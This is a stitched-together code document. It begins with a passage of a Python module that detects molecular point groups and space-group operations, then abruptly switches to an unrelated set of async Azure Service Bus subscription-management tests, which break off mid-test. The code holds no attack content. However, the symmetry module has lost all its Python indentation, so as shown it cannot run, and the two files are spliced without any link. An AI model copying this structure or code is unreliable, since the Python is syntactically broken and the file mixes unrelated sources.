c. Symmetric top molecules have 1 unique eigenvalue, which gives a
unique rotation axis. All axial point groups are possible
except the cubic groups (T & O) and I.
d. Spherical top molecules have all three eigenvalues equal. They
have the rare T, O or I point groups.
.. attribute:: sch_symbol
Schoenflies symbol of the detected point group.
"""
inversion_op = SymmOp.inversion()
def __init__(self, mol, tolerance=0.3, eigen_tolerance=0.01,
matrix_tol=0.1):
"""
The default settings are usually sufficient.
Args:
mol (Molecule): Molecule to determine point group for.
tolerance (float): Distance tolerance to consider sites as
symmetrically equivalent. Defaults to 0.3 Angstrom.
eigen_tolerance (float): Tolerance to compare eigen values of
the inertia tensor. Defaults to 0.01.
matrix_tol (float): Tolerance used to generate the full set of
symmetry operations of the point group.
"""
self.mol = mol
self.centered_mol = mol.get_centered_molecule()
self.tol = tolerance
self.eig_tol = eigen_tolerance
self.mat_tol = matrix_tol
self._analyze()
if self.sch_symbol in ["C1v", "C1h"]:
self.sch_symbol = "Cs"
def _analyze(self):
if len(self.centered_mol) == 1:
self.sch_symbol = "Kh"
else:
inertia_tensor = np.zeros((3, 3))
total_inertia = 0
for site in self.centered_mol:
c = site.coords
wt = site.species_and_occu.weight
for i in range(3):
inertia_tensor[i, i] += wt * (c[(i + 1) % 3] ** 2
+ c[(i + 2) % 3] ** 2)
for i, j in [(0, 1), (1, 2), (0, 2)]:
inertia_tensor[i, j] += -wt * c[i] * c[j]
inertia_tensor[j, i] += -wt * c[j] * c[i]
total_inertia += wt * np.dot(c, c)
# Normalize the inertia tensor so that it does not scale with size
# of the system. This mitigates the problem of choosing a proper
# comparison tolerance for the eigenvalues.
inertia_tensor /= total_inertia
eigvals, eigvecs = np.linalg.eig(inertia_tensor)
self.principal_axes = eigvecs.T
self.eigvals = eigvals
v1, v2, v3 = eigvals
eig_zero = abs(v1 * v2 * v3) < self.eig_tol ** 3
eig_all_same = abs(v1 - v2) < self.eig_tol and abs(
v1 - v3) < self.eig_tol
eig_all_diff = abs(v1 - v2) > self.eig_tol and abs(
v1 - v3) > self.eig_tol and abs(v2 - v3) > self.eig_tol
self.rot_sym = []
self.symmops = [SymmOp(np.eye(4))]
if eig_zero:
logger.debug("Linear molecule detected")
self._proc_linear()
elif eig_all_same:
logger.debug("Spherical top molecule detected")
self._proc_sph_top()
elif eig_all_diff:
logger.debug("Asymmetric top molecule detected")
self._proc_asym_top()
else:
logger.debug("Symmetric top molecule detected")
self._proc_sym_top()
def _proc_linear(self):
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.sch_symbol = "D*h"
self.symmops.append(PointGroupAnalyzer.inversion_op)
else:
self.sch_symbol = "C*v"
def _proc_asym_top(self):
"""
Handles asymmetric top molecules, which cannot contain rotational
symmetry larger than 2.
"""
self._check_R2_axes_asym()
if len(self.rot_sym) == 0:
logger.debug("No rotation symmetries detected.")
self._proc_no_rot_sym()
elif len(self.rot_sym) == 3:
logger.debug("Dihedral group detected.")
self._proc_dihedral()
else:
logger.debug("Cyclic group detected.")
self._proc_cyclic()
def _proc_sym_top(self):
"""
Handles symmetric top molecules, which have one unique eigenvalue whose
corresponding principal axis is a unique rotational axis. More complex
handling is required to look for R2 axes perpendicular to this unique
axis.
"""
if abs(self.eigvals[0] - self.eigvals[1]) < self.eig_tol:
ind = 2
elif abs(self.eigvals[1] - self.eigvals[2]) < self.eig_tol:
ind = 0
else:
ind = 1
logger.debug("Eigenvalues = %s." % self.eigvals)
unique_axis = self.principal_axes[ind]
self._check_rot_sym(unique_axis)
logger.debug("Rotation symmetries = %s" % self.rot_sym)
if len(self.rot_sym) > 0:
self._check_perpendicular_r2_axis(unique_axis)
if len(self.rot_sym) >= 2:
self._proc_dihedral()
elif len(self.rot_sym) == 1:
self._proc_cyclic()
else:
self._proc_no_rot_sym()
def _proc_no_rot_sym(self):
"""
Handles molecules with no rotational symmetry. Only possible point
groups are C1, Cs and Ci.
"""
self.sch_symbol = "C1"
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.sch_symbol = "Ci"
self.symmops.append(PointGroupAnalyzer.inversion_op)
else:
for v in self.principal_axes:
mirror_type = self._find_mirror(v)
if not mirror_type == "":
self.sch_symbol = "Cs"
break
def _proc_cyclic(self):
"""
Handles cyclic group molecules.
"""
main_axis, rot = max(self.rot_sym, key=lambda v: v[1])
self.sch_symbol = "C{}".format(rot)
mirror_type = self._find_mirror(main_axis)
if mirror_type == "h":
self.sch_symbol += "h"
elif mirror_type == "v":
self.sch_symbol += "v"
elif mirror_type == "":
if self.is_valid_op(SymmOp.rotoreflection(main_axis,
angle=180 / rot)):
self.sch_symbol = "S{}".format(2 * rot)
def _proc_dihedral(self):
"""
Handles dihedral group molecules, i.e., those with intersecting R2 axes
and a main axis.
"""
main_axis, rot = max(self.rot_sym, key=lambda v: v[1])
self.sch_symbol = "D{}".format(rot)
mirror_type = self._find_mirror(main_axis)
if mirror_type == "h":
self.sch_symbol += "h"
elif not mirror_type == "":
self.sch_symbol += "d"
def _check_R2_axes_asym(self):
"""
Test for 2-fold rotation along the principal axes. Used to handle
asymmetric top molecules.
"""
for v in self.principal_axes:
op = SymmOp.from_axis_angle_and_translation(v, 180)
if self.is_valid_op(op):
self.symmops.append(op)
self.rot_sym.append((v, 2))
def _find_mirror(self, axis):
"""
Looks for mirror symmetry of specified type about axis. Possible
types are "h" or "vd". Horizontal (h) mirrors are perpendicular to
the axis while vertical (v) or diagonal (d) mirrors are parallel. v
mirrors have atoms lying on the mirror plane while d mirrors do
not.
"""
mirror_type = ""
# First test whether the axis itself is the normal to a mirror plane.
if self.is_valid_op(SymmOp.reflection(axis)):
self.symmops.append(SymmOp.reflection(axis))
mirror_type = "h"
else:
# Iterate through all pairs of atoms to find mirror
for s1, s2 in itertools.combinations(self.centered_mol, 2):
if s1.species_and_occu == s2.species_and_occu:
normal = s1.coords - s2.coords
if np.dot(normal, axis) < self.tol:
op = SymmOp.reflection(normal)
if self.is_valid_op(op):
self.symmops.append(op)
if len(self.rot_sym) > 1:
mirror_type = "d"
for v, r in self.rot_sym:
if not np.linalg.norm(v - axis) < self.tol:
if np.dot(v, normal) < self.tol:
mirror_type = "v"
break
else:
mirror_type = "v"
break
return mirror_type
def _get_smallest_set_not_on_axis(self, axis):
"""
Returns the smallest list of atoms with the same species and
distance from the origin that do not lie on the specified axis. This
minimal set limits the possible rotational symmetry operations,
since atoms lying on a test axis are irrelevant in testing rotational
symmetry operations.
"""
def not_on_axis(site):
v = np.cross(site.coords, axis)
return np.linalg.norm(v) > self.tol
valid_sets = []
origin_site, dist_el_sites = cluster_sites(self.centered_mol, self.tol)
for test_set in dist_el_sites.values():
valid_set = list(filter(not_on_axis, test_set))
if len(valid_set) > 0:
valid_sets.append(valid_set)
return min(valid_sets, key=lambda s: len(s))
def _check_rot_sym(self, axis):
"""
Determines the rotational symmetry about supplied axis. Used only for
symmetric top molecules, which have possible rotational symmetry
operations > 2.
"""
min_set = self._get_smallest_set_not_on_axis(axis)
max_sym = len(min_set)
for i in range(max_sym, 0, -1):
if max_sym % i != 0:
continue
op = SymmOp.from_axis_angle_and_translation(axis, 360 / i)
rotvalid = self.is_valid_op(op)
if rotvalid:
self.symmops.append(op)
self.rot_sym.append((axis, i))
return i
return 1
def _check_perpendicular_r2_axis(self, axis):
"""
Checks for R2 axes perpendicular to unique axis. For handling
symmetric top molecules.
"""
min_set = self._get_smallest_set_not_on_axis(axis)
for s1, s2 in itertools.combinations(min_set, 2):
test_axis = np.cross(s1.coords - s2.coords, axis)
if np.linalg.norm(test_axis) > self.tol:
op = SymmOp.from_axis_angle_and_translation(test_axis, 180)
r2present = self.is_valid_op(op)
if r2present:
self.symmops.append(op)
self.rot_sym.append((test_axis, 2))
return True
def _proc_sph_top(self):
"""
Handles spherical top molecules, which belong to the T, O or I point
groups.
"""
self._find_spherical_axes()
if len(self.rot_sym) == 0:
logger.debug("Accidental speherical top!")
self._proc_sym_top()
main_axis, rot = max(self.rot_sym, key=lambda v: v[1])
if rot < 3:
logger.debug("Accidental speherical top!")
self._proc_sym_top()
elif rot == 3:
mirror_type = self._find_mirror(main_axis)
if mirror_type != "":
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.symmops.append(PointGroupAnalyzer.inversion_op)
self.sch_symbol = "Th"
else:
self.sch_symbol = "Td"
else:
self.sch_symbol = "T"
elif rot == 4:
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.symmops.append(PointGroupAnalyzer.inversion_op)
self.sch_symbol = "Oh"
else:
self.sch_symbol = "O"
elif rot == 5:
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.symmops.append(PointGroupAnalyzer.inversion_op)
self.sch_symbol = "Ih"
else:
self.sch_symbol = "I"
def _find_spherical_axes(self):
"""
Looks for R5, R4, R3 and R2 axes in spherical top molecules. Point
group T molecules have only one unique 3-fold and one unique 2-fold
axis. O molecules have one unique 4-, 3- and 2-fold axis. I molecules
have a unique 5-fold axis.
"""
rot_present = defaultdict(bool)
origin_site, dist_el_sites = cluster_sites(self.centered_mol, self.tol)
test_set = min(dist_el_sites.values(), key=lambda s: len(s))
coords = [s.coords for s in test_set]
for c1, c2, c3 in itertools.combinations(coords, 3):
for cc1, cc2 in itertools.combinations([c1, c2, c3], 2):
if not rot_present[2]:
test_axis = cc1 + cc2
if np.linalg.norm(test_axis) > self.tol:
op = SymmOp.from_axis_angle_and_translation(test_axis,
180)
rot_present[2] = self.is_valid_op(op)
if rot_present[2]:
self.symmops.append(op)
self.rot_sym.append((test_axis, 2))
test_axis = np.cross(c2 - c1, c3 - c1)
if np.linalg.norm(test_axis) > self.tol:
for r in (3, 4, 5):
if not rot_present[r]:
op = SymmOp.from_axis_angle_and_translation(
test_axis, 360 / r)
rot_present[r] = self.is_valid_op(op)
if rot_present[r]:
self.symmops.append(op)
self.rot_sym.append((test_axis, r))
break
if rot_present[2] and rot_present[3] and (
rot_present[4] or rot_present[5]):
break
def get_pointgroup(self):
"""
Returns a PointGroup object for the molecule.
"""
return PointGroupOperations(self.sch_symbol, self.symmops, self.mat_tol)
def is_valid_op(self, symmop):
"""
Check if a particular symmetry operation is a valid symmetry operation
for a molecule, i.e., the operation maps all atoms to another
equivalent atom.
Args:
symmop (SymmOp): Symmetry operation to test.
Returns:
(bool): Whether SymmOp is valid for Molecule.
"""
coords = self.centered_mol.cart_coords
for site in self.centered_mol:
coord = symmop.operate(site.coords)
ind = find_in_coord_list(coords, coord, self.tol)
if not (len(ind) == 1 and self.centered_mol[ind[0]].species_and_occu == site.species_and_occu):
return False
return True
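# Hedged usage sketch (the `ch4_coords` coordinates are hypothetical; not
# part of the original module):
# from pymatgen.core.structure import Molecule
# ch4 = Molecule(["C", "H", "H", "H", "H"], ch4_coords)
# pga = PointGroupAnalyzer(ch4)
# pga.sch_symbol        # 'Td' for an ideal methane geometry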
def cluster_sites(mol, tol):
"""
Cluster sites based on distance and species type.
Args:
mol (Molecule): Molecule **with origin at center of mass**.
tol (float): Tolerance to use.
Returns:
(origin_site, clustered_sites): origin_site is a site at the center
of mass (None if there are no origin atoms). clustered_sites is a
dict of {(avg_dist, species_and_occu): [list of sites]}
"""
# Cluster works for dim > 2 data. We just add a dummy 0 for second
# coordinate.
dists = [[np.linalg.norm(site.coords), 0] for site in mol]
import scipy.cluster as spcluster
f = spcluster.hierarchy.fclusterdata(dists, tol, criterion='distance')
clustered_dists = defaultdict(list)
for i, site in enumerate(mol):
clustered_dists[f[i]].append(dists[i])
avg_dist = {label: np.mean(val) for label, val in clustered_dists.items()}
clustered_sites = defaultdict(list)
origin_site = None
for i, site in enumerate(mol):
if avg_dist[f[i]] < tol:
origin_site = site
else:
clustered_sites[(avg_dist[f[i]],
site.species_and_occu)].append(site)
return origin_site, clustered_sites
def generate_full_symmops(symmops, tol, max_recursion_depth=300):
"""
Recursive algorithm to permute through all possible combinations of the
initially supplied symmetry operations to arrive at a complete set of
operations mapping a single atom to all other equivalent atoms in the
point group. This assumes that the initial number already uniquely
identifies all operations.
Args:
symmops ([SymmOp]): Initial set of symmetry operations.
tol (float): Tolerance for comparing affine matrices.
max_recursion_depth (int): Cap on the number of generated operations;
exceeding it is treated as a sign of an infinite loop.
Returns:
Full set of symmetry operations.
"""
a = [o.affine_matrix for o in symmops]
if len(symmops) > max_recursion_depth:
logger.debug("Generation of symmetry operations in infinite loop. " +
"Possible error in initial operations or tolerance too "
"low.")
else:
for op1, op2 in itertools.product(symmops, symmops):
m = np.dot(op1.affine_matrix, op2.affine_matrix)
d = np.abs(a - m) < tol
if not np.any(np.all(np.all(d, axis=2), axis=1)):
return generate_full_symmops(symmops + [SymmOp(m)], tol,
max_recursion_depth)
return symmops
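# Hedged worked example: seeding generate_full_symmops with only the C2
# rotation and one vertical mirror of C2v generates the missing second
# mirror (their product), closing the group at four operations:
# E, C2, sigma_v and sigma_v'.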
class SpacegroupOperations(list):
"""
Represents a space group, which is a collection of symmetry operations.
Args:
int_symbol (str): International symbol of the spacegroup.
int_number (int): International number of the spacegroup.
symmops ([SymmOp]): Symmetry operations associated with the
spacegroup.
"""
def __init__(self, int_symbol, int_number, symmops):
self.int_symbol = int_symbol
self.int_number = int_number
super(SpacegroupOperations, self).__init__(symmops)
def are_symmetrically_equivalent(self, sites1, sites2, symm_prec=1e-3):
"""
Given two sets of PeriodicSites, test if they are actually
symmetrically equivalent under this space group. Useful, for example,
if you want to test if selecting atoms 1 and 2 out of a set of 4 atoms
are symmetrically the same as selecting atoms 3 and 4, etc.
One use is in PartialRemoveSpecie transformation to return only
symmetrically distinct arrangements of atoms.
Args:
sites1 ([Site]): 1st set of sites
sites2 ([Site]): 2nd set of sites
symm_prec (float): Tolerance in atomic distance to test if atoms
are symmetrically similar.
Returns:
(bool): Whether the two sets of sites are symmetrically
equivalent.
"""
def in_sites(site):
for test_site in sites1:
if test_site.is_periodic_image(site, symm_prec, False):
return True
return False
for op in self:
newsites2 = [PeriodicSite(site.species_and_occu,
op.operate(site.frac_coords),
site.lattice) for site in sites2]
for site in newsites2:
if not in_sites(site):
break
else:
return True
return False
def __str__(self):
return "{} ({}) spacegroup".format(self.int_symbol, self.int_number)
class PointGroupOperations(list):
"""
Defines a point group, which is essentially a sequence of symmetry
operations.
Args:
sch_symbol (str): Schoenflies symbol of the point group.
operations ([SymmOp]): Initial set of symmetry operations. It is
sufficient to provide just enough operations to generate
the full set of symmetries.
tol (float): Tolerance to generate the full set of symmetry
operations.
.. attribute:: sch_symbol
Schoenflies symbol of the point group.
"""
def __init__(self, sch_symbol, operations, tol=0.1):
self.sch_symbol = sch_symbol
super(PointGroupOperations, self).__init__(
generate_full_symmops(operations, tol))
def __str__(self):
return self.sch_symbol
def __repr__(self):
return self.__str__()
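# Hedged usage sketch (assumes a local "POSCAR" structure file; not part of
# the original module):
# from pymatgen.core.structure import Structure
# s = Structure.from_file("POSCAR")
# sga = SpacegroupAnalyzer(s, symprec=0.1)
# sga.get_space_group_symbol()   # e.g. 'Pnma'
# sga.get_space_group_number()   # e.g. 62
# sga.get_crystal_system()       # e.g. 'orthorhombic'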
|
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import logging
import pytest
import datetime
import msrest
from azure.servicebus.aio.management import ServiceBusAdministrationClient
from azure.servicebus.management import SubscriptionProperties
from utilities import get_logger
from azure.core.exceptions import HttpResponseError, ResourceExistsError
from devtools_testutils import AzureMgmtTestCase, CachedResourceGroupPreparer
from servicebus_preparer import (
CachedServiceBusNamespacePreparer,
ServiceBusNamespacePreparer
)
from mgmt_test_utilities_async import async_pageable_to_list, clear_topics
_logger = get_logger(logging.DEBUG)
class ServiceBusAdministrationClientSubscriptionAsyncTests(AzureMgmtTestCase):
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_create_by_name(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "topic_testaddf"
subscription_name = "sub_testkkk"
try:
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(topic_name, subscription_name)
subscription = await mgmt_service.get_subscription(topic_name, subscription_name)
assert subscription.name == subscription_name
assert subscription.availability_status == 'Available'
assert subscription.status == 'Active'
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_create_with_subscription_description(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "iweidk"
subscription_name = "kdosako"
subscription_name_2 = "owazmq"
try:
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(
topic_name,
subscription_name=subscription_name,
auto_delete_on_idle=datetime.timedelta(minutes=10),
dead_lettering_on_message_expiration=True,
default_message_time_to_live=datetime.timedelta(minutes=11),
enable_batched_operations=True,
lock_duration=datetime.timedelta(seconds=13),
max_delivery_count=14,
requires_session=True
)
subscription = await mgmt_service.get_subscription(topic_name, subscription_name)
assert subscription.name == subscription_name
assert subscription.auto_delete_on_idle == datetime.timedelta(minutes=10)
assert subscription.dead_lettering_on_message_expiration == True
assert subscription.default_message_time_to_live == datetime.timedelta(minutes=11)
assert subscription.enable_batched_operations == True
assert subscription.lock_duration == datetime.timedelta(seconds=13)
assert subscription.max_delivery_count == 14
assert subscription.requires_session == True
await mgmt_service.create_subscription(
topic_name,
subscription_name=subscription_name_2,
auto_delete_on_idle="PT10M",
dead_lettering_on_message_expiration=True,
default_message_time_to_live="PT11M",
enable_batched_operations=True,
lock_duration="PT13S",
max_delivery_count=14,
requires_session=True
)
subscription_2 = await mgmt_service.get_subscription(topic_name, subscription_name_2)
assert subscription_2.name == subscription_name_2
assert subscription_2.auto_delete_on_idle == datetime.timedelta(minutes=10)
assert subscription_2.dead_lettering_on_message_expiration == True
assert subscription_2.default_message_time_to_live == datetime.timedelta(minutes=11)
assert subscription_2.enable_batched_operations == True
assert subscription_2.lock_duration == datetime.timedelta(seconds=13)
assert subscription_2.max_delivery_count == 14
assert subscription_2.requires_session == True
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_subscription(topic_name, subscription_name_2)
await mgmt_service.delete_topic(topic_name)
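# Note (hedged): the second subscription above exercises the ISO 8601
# duration strings ("PT10M" == timedelta(minutes=10), "PT11M" ==
# timedelta(minutes=11), "PT13S" == timedelta(seconds=13)), which the
# management client accepts interchangeably with datetime.timedelta.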
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_create_with_forward_to(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "iweidkforward"
subscription_name = "kdosakoforward"
queue_name = "dkfthj"
try:
await mgmt_service.create_queue(queue_name)
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(
topic_name,
subscription_name=subscription_name,
forward_dead_lettered_messages_to=queue_name,
forward_to=queue_name,
)
subscription = await mgmt_service.get_subscription(topic_name, subscription_name)
# Test forward_to (separately, as it changes auto_delete_on_idle when you enable it.)
# Note: we use endswith to work around the fact that the servicebus_namespace_name is replaced locally but not in the properties bag, and still test this.
assert subscription.forward_to.endswith(".servicebus.windows.net/{}".format(queue_name))
assert subscription.forward_dead_lettered_messages_to.endswith(".servicebus.windows.net/{}".format(queue_name))
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
await mgmt_service.delete_queue(queue_name)
await mgmt_service.close()
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_create_duplicate(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "dqkodq"
subscription_name = 'kkaqo'
try:
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(topic_name, subscription_name)
with pytest.raises(ResourceExistsError):
await mgmt_service.create_subscription(topic_name, subscription_name)
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_update_success(self, servicebus_namespace_connection_string, servicebus_namespace, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "fjrui"
subscription_name = "eqkovc"
queue_name = "dfkla"
try:
await mgmt_service.create_queue(queue_name)
topic_description = await mgmt_service.create_topic(topic_name)
subscription_description = await mgmt_service.create_subscription(topic_description.name, subscription_name)
# Try updating one setting.
subscription_description.lock_duration = datetime.timedelta(minutes=2)
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_name, subscription_name)
assert subscription_description.lock_duration == datetime.timedelta(minutes=2)
# Now try updating all settings.
subscription_description.auto_delete_on_idle = datetime.timedelta(minutes=10)
subscription_description.dead_lettering_on_message_expiration = True
subscription_description.default_message_time_to_live = datetime.timedelta(minutes=11)
subscription_description.lock_duration = datetime.timedelta(seconds=12)
subscription_description.max_delivery_count = 14
# topic_description.enable_partitioning = True # Cannot be changed after creation
# topic_description.requires_session = True # Cannot be changed after creation
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=10)
assert subscription_description.dead_lettering_on_message_expiration == True
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=11)
assert subscription_description.max_delivery_count == 14
assert subscription_description.lock_duration == datetime.timedelta(seconds=12)
# assert topic_description.enable_partitioning == True
# assert topic_description.requires_session == True
# Finally, test forward_to (separately, as it changes auto_delete_on_idle when you enable it.)
subscription_description.forward_to = "sb://{}.servicebus.windows.net/{}".format(servicebus_namespace.name, topic_name)
subscription_description.forward_dead_lettered_messages_to = "sb://{}.servicebus.windows.net/{}".format(servicebus_namespace.name, topic_name)
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
            # Note: we use endswith because the servicebus_namespace_name is replaced locally but not in the properties bag; the suffix check still validates this.
assert subscription_description.forward_to.endswith(".servicebus.windows.net/{}".format(topic_name))
assert subscription_description.forward_dead_lettered_messages_to.endswith(".servicebus.windows.net/{}".format(topic_name))
# Update forward_to with entity name
subscription_description.forward_to = queue_name
subscription_description.forward_dead_lettered_messages_to = queue_name
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
            # Note: we use endswith because the servicebus_namespace_name is replaced locally but not in the properties bag; the suffix check still validates this.
assert subscription_description.forward_to.endswith(".servicebus.windows.net/{}".format(queue_name))
assert subscription_description.forward_dead_lettered_messages_to.endswith(".servicebus.windows.net/{}".format(queue_name))
# Update forward_to with None
subscription_description.forward_to = None
subscription_description.forward_dead_lettered_messages_to = None
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.forward_to is None
assert subscription_description.forward_dead_lettered_messages_to is None
subscription_description.auto_delete_on_idle = "PT10M1S"
subscription_description.default_message_time_to_live = "PT11M2S"
subscription_description.lock_duration = "PT3M3S"
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=10, seconds=1)
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=11, seconds=2)
assert subscription_description.lock_duration == datetime.timedelta(minutes=3, seconds=3)
# updating all settings with keyword arguments.
await mgmt_service.update_subscription(
topic_description.name,
subscription_description,
auto_delete_on_idle=datetime.timedelta(minutes=15),
dead_lettering_on_message_expiration=False,
default_message_time_to_live=datetime.timedelta(minutes=16),
lock_duration=datetime.timedelta(seconds=17),
max_delivery_count=15,
forward_to=None,
forward_dead_lettered_messages_to=None
)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=15)
assert subscription_description.dead_lettering_on_message_expiration == False
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=16)
assert subscription_description.max_delivery_count == 15
assert subscription_description.lock_duration == datetime.timedelta(seconds=17)
            assert subscription_description.forward_to is None
            assert subscription_description.forward_dead_lettered_messages_to is None
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
await mgmt_service.delete_queue(queue_name)
await mgmt_service.close()
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_update_invalid(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "dfjfj"
subscription_name = "kwqxc"
try:
topic_description = await mgmt_service.create_topic(topic_name)
subscription_description = await mgmt_service.create_subscription(topic_name, subscription_name)
# handle a null update properly.
with pytest.raises(TypeError):
await mgmt_service.update_subscription(topic_name, None)
# handle an invalid type update properly.
with pytest.raises(TypeError):
await mgmt_service.update_subscription(topic_name, Exception("test"))
            # change the name to a subscription that doesn't exist; should fail.
subscription_description.name = "iewdm"
with pytest.raises(HttpResponseError):
await mgmt_service.update_subscription(topic_name, subscription_description)
subscription_description.name = subscription_name
            # change the name to an invalid (empty) name; should fail.
subscription_description.name = ''
with pytest.raises(msrest.exceptions.ValidationError):
await mgmt_service.update_subscription(topic_name, subscription_description)
            subscription_description.name = subscription_name
# change to a setting with an invalid value; should still fail.
subscription_description.lock_duration = datetime.timedelta(days=25)
with pytest.raises(HttpResponseError):
await mgmt_service.update_subscription(topic_name, subscription_description)
subscription_description.lock_duration = datetime.timedelta(minutes=5)
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_delete(self, servicebus_namespace_connection_string):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = 'test_topicgda'
subscription_name_1 = 'test_sub1da'
subscription_name_2 = 'test_sub2gcv'
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(topic_name, subscription_name_1)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 1
await mgmt_service.create_subscription(topic_name, subscription_name_2)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 2
description = await mgmt_service.get_subscription(topic_name, subscription_name_1)
await mgmt_service.delete_subscription(topic_name, description.name)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 1 and subscriptions[0].name == subscription_name_2
await mgmt_service.delete_subscription(topic_name, subscription_name_2)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 0
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_list(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = 'lkoqxc'
subscription_name_1 = 'testsub1'
subscription_name_2 = 'testsub2'
await mgmt_service.create_topic(topic_name)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 0
await mgmt_service.create_subscription(topic_name, subscription_name_1)
await mgmt_service.create_subscription(topic_name, subscription_name_2)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 2
assert subscriptions[0].name == subscription_name_1
assert subscriptions[1].name == subscription_name_2
await mgmt_service.delete_subscription(topic_name, subscription_name_1)
await mgmt_service.delete_subscription(topic_name, subscription_name_2)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 0
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_list_runtime_properties(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = 'dkoamv'
subscription_name = 'cxqplc'
await mgmt_service.create_topic(topic_name)
subs = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
subs_infos = await async_pageable_to_list(mgmt_service.list_subscriptions_runtime_properties(topic_name))
assert len(subs) == len(subs_infos) == 0
await mgmt_service.create_subscription(topic_name, subscription_name)
subs = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
